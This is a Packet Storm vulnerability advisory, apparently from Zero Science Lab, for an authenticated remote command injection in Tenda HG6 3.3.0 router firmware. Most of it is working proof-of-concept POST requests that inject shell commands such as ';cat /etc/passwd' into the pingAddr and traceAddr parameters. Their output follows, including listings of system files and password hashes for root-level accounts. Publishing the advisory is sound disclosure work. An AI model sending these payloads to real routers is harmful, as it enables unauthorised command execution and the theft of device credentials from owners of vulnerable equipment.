exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Tenda HG6 3.3.0 Remote Command Injection

Tenda HG6 3.3.0 Remote Command Injection
Posted May 3, 2022
Authored by LiquidWorm | Site zeroscience.mk

Tenda HG6 version 3.3.0 suffers from a remote command injection vulnerability. It can be exploited to inject and execute arbitrary shell commands through the pingAddr and traceAddr HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

tags | exploit, remote, web, arbitrary, shell
SHA-256 | 49f6e50dad2f50c5f9bee5f1105d5092b826a6f5ba27d2193fc00498390e1373

Tenda HG6 3.3.0 Remote Command Injection

Change Mirror Download

Tenda HG6 v3.3.0 Remote Command Injection Vulnerability


Vendor: Tenda Technology Co.,Ltd.
Product web page: https://www.tendacn.com
https://www.tendacn.com/product/HG6.html
Affected version: Firmware version: 3.3.0-210926
Software version: v1.1.0
Hardware Version: v1.0
Check Version: TD_HG6_XPON_TDE_ISP

Summary: HG6 is an intelligent routing passive optical network
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),
a voice port to meet users' requirements for enjoying the Internet,
HD IPTV and VoIP multi-service applications.

Desc: The application suffers from an authenticated OS command injection
vulnerability. This can be exploited to inject and execute arbitrary
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters
in formPing, formPing6, formTracert and formTracert6 interfaces.

Tested on: Boa/0.93.15


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2022-5706
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php


22.04.2022

--


ping.asp:
---------

POST /boaform/formPing HTTP/1.1
Host: 192.168.1.1

pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564

---
TZ
app.gwdt
bftpd.conf
buildtime
check_version.txt
config
config.csv
config_default.xml
config_default_hs.xml
dhclient-script
dnsmasq.conf
ethertypes
factory_default.xml
ftpdpassword
group
hardversion
inetd.conf
init.d
inittab
innversion
insdrv.sh
irf
mdev.conf
omci_custom_opt.conf
omci_ignore_mib_tbl.conf
omci_ignore_mib_tbl_10g.conf
omci_mib.cfg
orf
passwd
ppp
profile
protocols
radvd.conf
ramfs.img
rc_boot_dsp
rc_voip
release_date
resolv.conf
rtk_tr142.sh
run_customized_sdk.sh
runoam.sh
runomci.sh
runsdk.sh
samba
scripts
services
setprmt_reject
shells
simplecfgservice.xml
smb.conf
softversion
solar.conf
solar.conf.in
ssl_cert.pem
ssl_key.pem
version
wscd.conf


ping6.asp:
----------

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.1.1

pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp

---
boa.conf
web


tracert.asp:
------------

POST /boaform/formTracert HTTP/1.1
Host: 192.168.1.1

traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp

---
/home/httpd


tracert6.asp:
-------------

POST /boaform/formTracert6 HTTP/1.1
Host: 192.168.1.1

traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp

---
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh
nobody:x:0:0::/tmp:/dev/null
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    11 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close